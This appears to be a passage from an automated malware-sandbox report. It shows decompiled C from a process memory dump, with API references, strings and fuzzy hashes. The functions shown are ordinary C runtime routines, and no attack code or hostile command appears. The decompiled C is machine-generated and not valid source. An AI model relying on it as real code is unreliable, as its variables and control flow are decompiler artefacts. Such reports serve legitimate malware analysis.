0x0041a084
0x0041a087
0x0041a08c
0x0041a08d
0x0041a090
0x0041a093
0x0041a096
0x0041a0a0
0x0041a160
0x0041a160
0x0041a0a6
0x0041a0ae
0x0041a0b8
0x0041a0c1
0x0041a0c9
0x0041a0cb
0x0041a0d3
0x0041a0dd
0x00000000
0x0041a0df
0x0041a0ec
0x0041a0f2
0x0041a0f8
0x0041a0fb
0x0041a0fb
0x0041a101
0x0041a10a
0x0041a113
0x0041a117
0x00000000
0x0041a119
0x0041a11d
0x0041a126
0x0041a12c
0x0041a133
0x0041a13c
0x0041a13e
0x0041a13e
0x0041a148
0x0041a153
0x0041a15b
0x00000000
0x0041a15b
0x0041a117
0x0041a0ba
0x0041a0ba
0x0041a0ba
0x0041a0ba
0x0041a0b8
0x0041a165
0x0041a16d
0x0041a16e
0x0041a16f
0x0041a17d

APIs

lstrlen.KERNEL32(025C6320,C21D6F0A,?,025C6320,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A098
lstrlen.KERNEL32(025C6320,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0F2
GetProcessHeap.KERNEL32(00000008,-00000001), ref: 0041A103
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A10A
_strcpy_s.LIBCMT ref: 0041A148

Strings

0123456789ABCDEF, xrefs: 0041A05E

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Heaplstrlen$AllocProcess_strcpy_s
String ID: 0123456789ABCDEF
API String ID: 3087150108-2554083253
Opcode ID: cc4dc109b66911a6ce224c3b1cd5c1ee0855dbad38b09f63b81e749a87bcb282
Instruction ID: 2feb11e5959a8d0a74931ee5604f11cb70094c2f13b47fd37f09b34d47f9d1c8
Opcode Fuzzy Hash: cc4dc109b66911a6ce224c3b1cd5c1ee0855dbad38b09f63b81e749a87bcb282
Instruction Fuzzy Hash: F3419775A002559FCB04DFA5DC44A9EBBF9FB89314F00413AE815E7391EB349904CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00421AB0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00421AB0(intOrPtr* __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr* _t19;
				char* _t28;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr* _t36;
				signed int _t41;
				intOrPtr _t47;
				intOrPtr* _t52;

				_t41 = __edx;
				_t32 = _a4;
				_t52 = __ecx;
				_t16 =  *((intOrPtr*)(__ecx + 0x10));
				if(_t16 < _a4) {
					_t16 = E004297E6("invalid string position");
				}
				_t34 = _a8;
				if((_t41 | 0xffffffff) - _t16 <= _t34) {
					_t16 = E00429799("string too long");
				}
				if(_t34 == 0) {
					L23:
					return _t52;
				} else {
					_t47 = _t16 + _t34;
					if(_t47 > 0xfffffffe) {
						_t16 = E00429799("string too long");
					}
					_t35 =  *((intOrPtr*)(_t52 + 0x14));
					if(_t35 >= _t47) {
						if(_t47 != 0) {
							goto L9;
						} else {
							 *((intOrPtr*)(_t52 + 0x10)) = _t47;
							if(_t35 < 0x10) {
								_t28 = _t52;
								 *_t28 = 0;
								return _t28;
							} else {
								 *((char*)( *_t52)) = 0;
								return _t52;
							}
						}
					} else {
						E004044F0(_t52, _t47, _t16);
						if(_t47 == 0) {
							L22:
							goto L23;
						} else {
							L9:
							_t18 =  *((intOrPtr*)(_t52 + 0x14));
							if(_t18 < 0x10) {
								_t36 = _t52;
							} else {
								_t36 =  *_t52;
							}
							if(_t18 < 0x10) {
								_t19 = _t52;
							} else {
								_t19 =  *_t52;
							}
							E0042C040(_t19 + _t32 + _a8, _t36 + _t32,  *((intOrPtr*)(_t52 + 0x10)) - _t32);
							E0040A260(_t52, _t32, _a8, _a12);
							 *((intOrPtr*)(_t52 + 0x10)) = _t47;
							if( *((intOrPtr*)(_t52 + 0x14)) < 0x10) {
								 *((char*)(_t52 + _t47)) = 0;
								goto L22;
							} else {
								 *((char*)( *_t52 + _t47)) = 0;
								return _t52;
							}
						}
					}
				}
			}

0x00421ab0
0x00421ab4
0x00421ab8
0x00421aba
0x00421abf
0x00421ac6
0x00421ac6
0x00421acb
0x00421ad5
0x00421adc
0x00421adc
0x00421ae3
0x00421b99
0x00421b9e
0x00421ae9
0x00421aea
0x00421af0
0x00421af7
0x00421af7
0x00421afc
0x00421b01
0x00421b22
0x00000000
0x00421b24
0x00421b24
0x00421b2a
0x00421b3b
0x00421b3e
0x00421b43
0x00421b2c
0x00421b2f
0x00421b37
0x00421b37
0x00421b2a
0x00421b03
0x00421b07
0x00421b0e
0x00421b98
0x00000000
0x00421b14
0x00421b14
0x00421b14
0x00421b1a
0x00421b46
0x00421b1c
0x00421b1c
0x00421b1c
0x00421b4b
0x00421b51
0x00421b4d
0x00421b4d
0x00421b4d
0x00421b62
0x00421b75
0x00421b7e
0x00421b81
0x00421b94
0x00000000
0x00421b83
0x00421b85
0x00421b8f
0x00421b8f
0x00421b81
0x00421b0e
0x00421b01

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00421AC6

Part of subcall function 004297E6: std::exception::exception.LIBCMT ref: 004297FB
Part of subcall function 004297E6: __CxxThrowException@8.LIBCMT ref: 00429810
Part of subcall function 004297E6: std::exception::exception.LIBCMT ref: 00429821

std::_Xinvalid_argument.LIBCPMT ref: 00421ADC
std::_Xinvalid_argument.LIBCPMT ref: 00421AF7
_memmove.LIBCMT ref: 00421B62

Strings

string too long, xrefs: 00421AD7, 00421AF2
invalid string position, xrefs: 00421AC1

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 443534600-4289949731
Opcode ID: 60caecc15c4c321865efcf0bca49e2c14ba59ee4c5003aeb561d20a60f5bb28d
Instruction ID: eea26c06b459186eec45bd465fc70dff13cdba71ff546a5f0e8d7d21d3b84273
Opcode Fuzzy Hash: 60caecc15c4c321865efcf0bca49e2c14ba59ee4c5003aeb561d20a60f5bb28d
Instruction Fuzzy Hash: 9831D8323002209BE7249E5CF881E6EF7A9DBA1724B504A2FF451C73A1D779AC01836C

Uniqueness

Uniqueness Score: -1.00%

Function 0041E870 Relevance: 10.6, APIs: 7, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E0041E870() {
				char _v8;
				intOrPtr* _v12;
				void* __edi;
				void* __esi;
				char* _t11;
				intOrPtr _t14;
				intOrPtr* _t18;
				void* _t20;
				intOrPtr* _t21;
				char _t24;
				intOrPtr _t25;
				intOrPtr* _t26;
				void* _t27;

				_t11 =  &_v8;
				_t26 = 0;
				_v8 = 0;
				_t20 = 0;
				_v12 = 0;
				_t25 = 0;
				__imp__GetLogicalProcessorInformationEx(0xffff, 0, _t11);
				if(_t11 != 0) {
					L7:
					_t24 = _v8;
					_t21 = _t26;
					if(_t24 != 0) {
						do {
							_t21 = _t21 + _t25;
							if( *_t21 == 0) {
								_v12 = _v12 + 1;
							}
							_t14 =  *((intOrPtr*)(_t21 + 4));
							_t20 = _t20 + _t14;
							_t25 = _t14;
						} while (_t20 < _t24);
					}
					E0042BE8C(_t26);
					return _v12;
				} else {
					while(GetLastError() == 0x7a) {
						if(_t26 != 0) {
							E0042BE8C(_t26);
							_t27 = _t27 + 4;
						}
						_t18 = E0042BDF8(_t23, _t25, _t26, _v8);
						_t26 = _t18;
						_t27 = _t27 + 4;
						if(_t26 == 0) {
							L14:
							return 0;
						} else {
							_t23 =  &_v8;
							__imp__GetLogicalProcessorInformationEx(0xffff, _t26,  &_v8);
							if(_t18 == 0) {
								continue;
							} else {
								goto L7;
							}
						}
						goto L15;
					}
					if(_t26 != 0) {
						E0042BE8C(_t26);
					}
					goto L14;
				}
				L15:
			}

0x0041e879
0x0041e87c
0x0041e885
0x0041e888
0x0041e88a
0x0041e88d
0x0041e88f
0x0041e897
0x0041e8de
0x0041e8de
0x0041e8e1
0x0041e8e5
0x0041e8e7
0x0041e8e7
0x0041e8ec
0x0041e8ee
0x0041e8ee
0x0041e8f1
0x0041e8f4
0x0041e8f6
0x0041e8f8
0x0041e8e7
0x0041e8fd
0x0041e90e
0x0041e8a0
0x0041e8a0
0x0041e8ad
0x0041e8b0
0x0041e8b5
0x0041e8b5
0x0041e8bc
0x0041e8c1
0x0041e8c3
0x0041e8c8
0x0041e91e
0x0041e924
0x0041e8ca
0x0041e8ca
0x0041e8d4
0x0041e8dc
0x00000000
0x00000000
0x00000000
0x00000000
0x0041e8dc
0x00000000
0x0041e8c8
0x0041e911
0x0041e914
0x0041e919
0x00000000
0x0041e911
0x00000000

APIs

GetLogicalProcessorInformationEx.KERNEL32(0000FFFF,00000000,0040CE48,?,00000010,?,?,0040CE48), ref: 0041E88F
GetLastError.KERNEL32(?,00000010,?,?,0040CE48), ref: 0041E8A0
_free.LIBCMT ref: 0041E8B0

Part of subcall function 0042BE8C: HeapFree.KERNEL32(00000000,00000000,?,004324A5,00000000,?,?,0042FC94,0042BE81,?), ref: 0042BEA2
Part of subcall function 0042BE8C: GetLastError.KERNEL32(00000000,?,004324A5,00000000,?,?,0042FC94,0042BE81,?), ref: 0042BEB4

_malloc.LIBCMT ref: 0041E8BC
GetLogicalProcessorInformationEx.KERNEL32(0000FFFF,00000000,0040CE48,?,?,0040CE48), ref: 0041E8D4
_free.LIBCMT ref: 0041E8FD
_free.LIBCMT ref: 0041E914

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _free$ErrorInformationLastLogicalProcessor$FreeHeap_malloc
String ID:
API String ID: 1407183230-0
Opcode ID: f6b3a1074d2798b535033a7b700cbccc705b1fe119df0222eecf7baa76445f0d
Instruction ID: 4c64f535e45a19a500b028db5d1cdc076dcca648b14e046bbdcd0db4135a3d3e
Opcode Fuzzy Hash: f6b3a1074d2798b535033a7b700cbccc705b1fe119df0222eecf7baa76445f0d
Instruction Fuzzy Hash: 5B110676F012286BDB20AB96AC407EF7768EF82720F54017AFD0897300E7399E45C2D9

Uniqueness

Uniqueness Score: -1.00%

Function 0042D02B Relevance: 10.6, APIs: 7, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E0042D02B(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t11;
				intOrPtr _t13;
				void* _t19;
				intOrPtr _t22;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				void* _t27;
				void* _t33;
				signed int _t36;
				intOrPtr* _t37;
				void* _t39;
				intOrPtr* _t40;
				intOrPtr* _t41;

				_t40 = __imp__DecodePointer;
				_t11 =  *_t40( *0x465a68, _t33, _t39, _t23, _t27);
				_t24 = _t11;
				_v8 = _t24;
				_t41 =  *_t40( *0x465a64);
				if(_t41 < _t24) {
					L11:
					_t13 = 0;
				} else {
					_t36 = _t41 - _t24;
					_t2 = _t36 + 4; // 0x4
					if(_t2 < 4) {
						goto L11;
					} else {
						_t26 = E0043370E(_t24);
						_t3 = _t36 + 4; // 0x4
						if(_t26 >= _t3) {
							L10:
							_t37 = __imp__EncodePointer;
							 *_t41 =  *_t37(_a4);
							 *0x465a64 =  *_t37(_t41 + 4);
							_t13 = _a4;
						} else {
							_t19 = 0x800;
							if(_t26 < 0x800) {
								_t19 = _t26;
							}
							_t20 = _t19 + _t26;
							if(_t19 + _t26 < _t26) {
								L7:
								_t5 = _t26 + 0x10; // 0x10
								_t21 = _t5;
								if(_t5 < _t26) {
									goto L11;
								} else {
									_t22 = E0042EBFE(_v8, _t21);
									if(_t22 == 0) {
										goto L11;
									} else {
										goto L9;
									}
								}
							} else {
								_t22 = E0042EBFE(_v8, _t20);
								if(_t22 != 0) {
									L9:
									_t41 = _t22 + (_t36 >> 2) * 4;
									__imp__EncodePointer(_t22);
									 *0x465a68 = _t22;
									goto L10;
								} else {
									goto L7;
								}
							}
						}
					}
				}
				return _t13;
			}

0x0042d033
0x0042d040
0x0042d048
0x0042d04a
0x0042d04f
0x0042d053
0x0042d0da
0x0042d0da
0x0042d059
0x0042d05b
0x0042d05d
0x0042d063
0x00000000
0x0042d065
0x0042d06b
0x0042d06d
0x0042d073
0x0042d0bd
0x0042d0c0
0x0042d0c8
0x0042d0d0
0x0042d0d5
0x0042d075
0x0042d075
0x0042d07c
0x0042d07e
0x0042d07e
0x0042d080
0x0042d084
0x0042d095
0x0042d095
0x0042d095
0x0042d09a
0x00000000
0x0042d09c
0x0042d0a0
0x0042d0a9
0x00000000
0x00000000
0x00000000
0x00000000
0x0042d0a9
0x0042d086
0x0042d08a
0x0042d093
0x0042d0ab
0x0042d0af
0x0042d0b2
0x0042d0b8
0x00000000
0x00000000
0x00000000
0x00000000
0x0042d093
0x0042d084
0x0042d073
0x0042d063
0x0042d0e0

APIs

DecodePointer.KERNEL32(00464BA8,00443C14,?,?,?,0042D12F,?,0044D0B0,0000000C,0042D15B,?,?,0042C5A5,0043FF01,?), ref: 0042D040
DecodePointer.KERNEL32(?,?,0042D12F,?,0044D0B0,0000000C,0042D15B,?,?,0042C5A5,0043FF01,?), ref: 0042D04D
__realloc_crt.LIBCMT ref: 0042D08A
__realloc_crt.LIBCMT ref: 0042D0A0
EncodePointer.KERNEL32(00000000,?,?,0042D12F,?,0044D0B0,0000000C,0042D15B,?,?,0042C5A5,0043FF01,?), ref: 0042D0B2
EncodePointer.KERNEL32(?,?,?,0042D12F,?,0044D0B0,0000000C,0042D15B,?,?,0042C5A5,0043FF01,?), ref: 0042D0C6
EncodePointer.KERNEL32(-00000004,?,?,0042D12F,?,0044D0B0,0000000C,0042D15B,?,?,0042C5A5,0043FF01,?), ref: 0042D0CE

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Pointer$Encode$Decode__realloc_crt
String ID:
API String ID: 4108716018-0
Opcode ID: daa0bbfe4bb15809e8e7f70c1a9e5fc418d2d0a4cc6cacbe7167ffa707462f46
Instruction ID: 4b2057b8048df1e3cf2634bc765f55caa1a4d6312d5472747de804a4ac175948
Opcode Fuzzy Hash: daa0bbfe4bb15809e8e7f70c1a9e5fc418d2d0a4cc6cacbe7167ffa707462f46
Instruction Fuzzy Hash: 0911D672B00225AFDB109F66FDC089A7BE9EB45324B54003BE506D7230EB75ED418788

Uniqueness

Uniqueness Score: -1.00%

Function 0042FA21 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0042FA21(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v20;
				intOrPtr _v32;
				signed int _t23;
				intOrPtr _t32;
				signed int _t36;
				char* _t43;
				signed int _t44;
				void* _t51;
				signed int _t54;
				void* _t57;
				char* _t58;
				signed int _t59;
				void* _t62;
				void* _t64;

				_t51 = __edx;
				_t62 = _t64;
				_push(__ebx);
				_push(__esi);
				_t57 = E0043243B(__ebx);
				if(_t57 != 0) {
					_push(__edi);
					__eflags =  *(_t57 + 0x24);
					if( *(_t57 + 0x24) != 0) {
						L7:
						_t58 =  *(_t57 + 0x24);
						_t23 = E0042C3A1(_t58, 0x86, E0042F9F9(_a4));
						__eflags = _t23;
						if(_t23 != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E004314C7();
							asm("int3");
							_push(0xc);
							_push(0x44d278);
							E00433750(0, 0x86, _t58);
							_v32 = 0;
							_t54 = _a4;
							__eflags = _t54;
							__eflags = 0 | _t54 != 0x00000000;
							if(__eflags != 0) {
								_t59 = _a8;
								__eflags = _t59;
								__eflags = 0 | _t59 != 0x00000000;
								if(__eflags == 0) {
									goto L11;
								} else {
									__eflags =  *_t59;
									__eflags = 0 |  *_t59 != 0x00000000;
									if(__eflags == 0) {
										goto L11;
									} else {
										_t36 = E00438833(0, _t51, _t54, _t59, __eflags);
										_a4 = _t36;
										__eflags = _t36;
										if(__eflags != 0) {
											_v8 = 0;
											__eflags =  *_t54;
											if(__eflags != 0) {
												_v32 = E0043859C(_t54, _t59, _a12, _t36);
												_v8 = 0xfffffffe;
												E0042FB3D();
												_t32 = _v32;
											} else {
												 *((intOrPtr*)(E0042FC8F(__eflags))) = 0x16;
												E00438970(_t62, 0x451f00,  &_v20, 0xfffffffe);
												goto L12;
											}
										} else {
											 *((intOrPtr*)(E0042FC8F(__eflags))) = 0x18;
											goto L12;
										}
									}
								}
							} else {
								L11:
								 *((intOrPtr*)(E0042FC8F(__eflags))) = 0x16;
								E00431519();
								L12:
								_t32 = 0;
							}
							return E00433795(_t32);
						} else {
							_t43 = _t58;
							goto L5;
						}
					} else {
						_t44 = E0042EBB2(0x86, 1);
						 *(_t57 + 0x24) = _t44;
						__eflags = _t44;
						if(_t44 != 0) {
							goto L7;
						} else {
							_t43 = "Visual C++ CRT: Not enough memory to complete call to strerror.";
							L5:
							goto L6;
						}
					}
				} else {
					_t43 = "Visual C++ CRT: Not enough memory to complete call to strerror.";
					L6:
					return _t43;
				}
			}

0x0042fa21
0x0042fa24
0x0042fa26
0x0042fa27
0x0042fa2d
0x0042fa33
0x0042fa3c
0x0042fa42
0x0042fa45
0x0042fa62
0x0042fa65
0x0042fa70
0x0042fa78
0x0042fa7a
0x0042fa80
0x0042fa81
0x0042fa82
0x0042fa83
0x0042fa84
0x0042fa85
0x0042fa8a
0x0042fa8b
0x0042fa8d
0x0042fa92
0x0042fa99
0x0042fa9e
0x0042faa1
0x0042faa6
0x0042faa8
0x0042fac0
0x0042fac3
0x0042fac8
0x0042faca
0x00000000
0x0042facc
0x0042face
0x0042fad3
0x0042fad5
0x00000000
0x0042fad7
0x0042fad7
0x0042fadc
0x0042fadf
0x0042fae1
0x0042faf0
0x0042faf3
0x0042faf5
0x0042fb25
0x0042fb28
0x0042fb2f
0x0042fb34
0x0042faf7
0x0042fafc
0x0042fb0d
0x00000000
0x0042fb12
0x0042fae3
0x0042fae8
0x00000000
0x0042fae8
0x0042fae1
0x0042fad5
0x0042faaa
0x0042faaa
0x0042faaf
0x0042fab5
0x0042faba
0x0042faba
0x0042faba
0x0042fb3c
0x0042fa7c
0x0042fa7c
0x00000000
0x0042fa7c
0x0042fa47
0x0042fa4a
0x0042fa51
0x0042fa54
0x0042fa56
0x00000000
0x0042fa58
0x0042fa58
0x0042fa5d
0x00000000
0x0042fa5d
0x0042fa56
0x0042fa35
0x0042fa35
0x0042fa5e
0x0042fa61
0x0042fa61

APIs

__getptd_noexit.LIBCMT ref: 0042FA28

Part of subcall function 0043243B: GetLastError.KERNEL32(?,?,0042FC94,0042BE81,?,?,0042C560,?), ref: 0043243F
Part of subcall function 0043243B: ___set_flsgetvalue.LIBCMT ref: 0043244D
Part of subcall function 0043243B: __calloc_crt.LIBCMT ref: 00432461
Part of subcall function 0043243B: DecodePointer.KERNEL32(00000000,?,?,0042FC94,0042BE81,?,?,0042C560,?), ref: 0043247B
Part of subcall function 0043243B: GetCurrentThreadId.KERNEL32 ref: 00432491
Part of subcall function 0043243B: SetLastError.KERNEL32(00000000,?,?,0042FC94,0042BE81,?,?,0042C560,?), ref: 004324A9

__calloc_crt.LIBCMT ref: 0042FA4A
__get_sys_err_msg.LIBCMT ref: 0042FA68
_strcpy_s.LIBCMT ref: 0042FA70
__invoke_watson.LIBCMT ref: 0042FA85

Strings

Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 0042FA35, 0042FA58

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
API String ID: 3117964792-798102604
Opcode ID: fde275c1a4b5e2baf9f29427a92243d2a6b24eba4f7f990a8b83439e7c3f1510
Instruction ID: ac1906984a261b38937cad0bd5bedc8f04d099de4d10439503604825c11d3c94
Opcode Fuzzy Hash: fde275c1a4b5e2baf9f29427a92243d2a6b24eba4f7f990a8b83439e7c3f1510
Instruction Fuzzy Hash: D1F024727006306BDB20792B7C8192F72EC9B45768BD0863FFA0E93201E96DAC46029D

Uniqueness

Uniqueness Score: -1.00%

Function 00432387 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00432387(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t26;
				intOrPtr _t30;
				intOrPtr _t39;
				void* _t40;

				_t31 = __ebx;
				_push(8);
				_push(0x44d438);
				E00433750(__ebx, __edi, __esi);
				GetModuleHandleW(L"KERNEL32.DLL");
				_t39 =  *((intOrPtr*)(_t40 + 8));
				 *((intOrPtr*)(_t39 + 0x5c)) = 0x449140;
				 *(_t39 + 8) =  *(_t39 + 8) & 0x00000000;
				 *((intOrPtr*)(_t39 + 0x14)) = 1;
				 *((intOrPtr*)(_t39 + 0x70)) = 1;
				 *((char*)(_t39 + 0xc8)) = 0x43;
				 *((char*)(_t39 + 0x14b)) = 0x43;
				 *(_t39 + 0x68) = 0x4523c0;
				E00433F2B(__ebx, 1, 0xd);
				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
				_t12 = _t39 + 0x68; // 0x8458b20
				InterlockedIncrement( *_t12);
				 *(_t40 - 4) = 0xfffffffe;
				E00432429();
				E00433F2B(_t31, 1, 0xc);
				 *(_t40 - 4) = 1;
				_t26 =  *((intOrPtr*)(_t40 + 0xc));
				 *((intOrPtr*)(_t39 + 0x6c)) = _t26;
				if(_t26 == 0) {
					_t30 =  *0x452b28; // 0x25cabd8
					 *((intOrPtr*)(_t39 + 0x6c)) = _t30;
				}
				_t18 = _t39 + 0x6c; // 0x86a5756
				E00432F40( *_t18);
				 *(_t40 - 4) = 0xfffffffe;
				return E00433795(E00432432());
			}

0x00432387
0x00432387
0x00432389
0x0043238e
0x00432398
0x0043239e
0x004323a1
0x004323a8
0x004323af
0x004323b2
0x004323b5
0x004323bc
0x004323c3
0x004323cc
0x004323d2
0x004323d6
0x004323d9
0x004323df
0x004323e6
0x004323ed
0x004323f3
0x004323f6
0x004323f9
0x004323fe
0x00432400
0x00432405
0x00432405
0x00432408
0x0043240b
0x00432411
0x00432422

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,0044D438,00000008,0043248F,00000000,00000000,?,?,0042FC94,0042BE81,?,?,0042C560,?), ref: 00432398
__lock.LIBCMT ref: 004323CC

Part of subcall function 00433F2B: __mtinitlocknum.LIBCMT ref: 00433F41
Part of subcall function 00433F2B: __amsg_exit.LIBCMT ref: 00433F4D
Part of subcall function 00433F2B: EnterCriticalSection.KERNEL32(0042C560,0042C560,?,004323D1,0000000D), ref: 00433F55

InterlockedIncrement.KERNEL32(08458B20), ref: 004323D9
__lock.LIBCMT ref: 004323ED
___addlocaleref.LIBCMT ref: 0043240B

Strings

KERNEL32.DLL, xrefs: 00432393

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: bbbec0c4d97ab3d75d9b0d574a1ab25a14ae8d17b622dd5584845aa7c31fa0de
Instruction ID: a4547e1b783afd2a9f3408c4e8b7fd0b9ed63d123cdecac85ba49026669aca06
Opcode Fuzzy Hash: bbbec0c4d97ab3d75d9b0d574a1ab25a14ae8d17b622dd5584845aa7c31fa0de
Instruction Fuzzy Hash: F6018475844700DFE720EF66D906749FBF0AF18329F20990FE595962A1CBF8AA44CF18

Uniqueness

Uniqueness Score: -1.00%

Function 004221CF Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 490
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E004221CF(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, char* _a28, signed int _a32, signed int _a36, signed int _a40, signed int _a44) {
				intOrPtr _v4;
				char _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v28;
				signed int _v32;
				char _v48;
				intOrPtr _v56;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				short _v95;
				char _v96;
				signed int _v100;
				signed int _v104;
				char _v108;
				signed int _v112;
				signed int _v116;
				char _v120;
				intOrPtr _v124;
				intOrPtr* _v128;
				char _v132;
				intOrPtr _v136;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t219;
				signed int _t222;
				signed int _t223;
				char _t228;
				signed int _t230;
				char _t234;
				signed int _t238;
				char* _t239;
				void* _t243;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				intOrPtr* _t249;
				intOrPtr* _t251;
				intOrPtr* _t262;
				intOrPtr* _t264;
				intOrPtr* _t266;
				intOrPtr* _t271;
				intOrPtr* _t273;
				intOrPtr* _t278;
				intOrPtr* _t280;
				intOrPtr* _t283;
				intOrPtr* _t286;
				intOrPtr* _t288;
				char* _t289;
				char* _t296;
				signed int _t298;
				signed int _t299;
				signed int _t305;
				signed int _t309;
				signed int _t312;
				intOrPtr _t314;
				void* _t315;
				void* _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t322;
				signed int _t323;
				intOrPtr _t330;
				signed int _t331;
				intOrPtr _t348;
				char* _t349;
				intOrPtr _t390;
				intOrPtr _t395;
				signed int _t425;
				char* _t428;
				intOrPtr _t430;
				intOrPtr _t431;
				intOrPtr* _t433;
				signed int _t434;
				intOrPtr _t435;
				intOrPtr _t437;
				signed int _t440;
				signed int _t444;
				signed int _t446;
				signed int _t448;
				void* _t450;
				void* _t451;
				void* _t452;
				void* _t453;
				void* _t454;
				void* _t457;

				_t219 =  *((intOrPtr*)( *_v20 + 4)) + _v20;
				_t322 =  *(_t219 + 0xc) | 0x00000004;
				if( *((intOrPtr*)(_t219 + 0x38)) == 0) {
					_t322 = _t322 | 0x00000004;
				}
				_t323 = _t322 & 0x00000017;
				 *(_t219 + 0xc) = _t323;
				if(( *(_t219 + 0x10) & _t323) != 0) {
					E0042C5C1(0, 0);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_t446 = _t448;
					_push(0xffffffff);
					_push(E0043F898);
					_push( *[fs:0x0]);
					_t222 =  *0x451f00; // 0xc21d6f0a
					_t223 = _t222 ^ _t446;
					_v20 = _t223;
					_push(_t223);
					 *[fs:0x0] =  &_v16;
					_t312 = _a44;
					_t428 = _a28;
					_v136 = _a8;
					_v112 = _a36;
					_v92 = _a32;
					_v124 = _a20;
					_v88 = _a40;
					_v80 = _t312;
					_t228 = E00414D10(_a20,  &_v116);
					_v8 = 0;
					_t433 = E00421BB0(_t228);
					_t230 = _v116;
					_t450 = _t448 - 0x78 + 4;
					_v128 = _t433;
					_v8 = 0xffffffff;
					__eflags = _t230;
					if(_t230 != 0) {
						_t440 = _t230;
						_v100 = _t440;
						E00429A1B( &_v104, 0);
						_t305 =  *(_t440 + 4);
						__eflags = _t305;
						if(_t305 != 0) {
							__eflags = _t305 - 0xffffffff;
							if(_t305 < 0xffffffff) {
								_t309 = _t305 - 1;
								__eflags = _t309;
								 *(_t440 + 4) = _t309;
							}
						}
						asm("sbb esi, esi");
						E00429A43( &_v104);
						_t444 =  !( ~( *(_t440 + 4))) & _v100;
						__eflags = _t444;
						if(_t444 != 0) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t444))))(1);
						}
						_t433 = _v128;
					}
					E00421810(_t433,  &_v76);
					_v8 = 1;
					_v100 =  *((intOrPtr*)( *((intOrPtr*)( *_t433 + 8))))();
					_v28 = 0xf;
					_v32 = 0;
					_v48 = 0;
					_t234 =  *_t428;
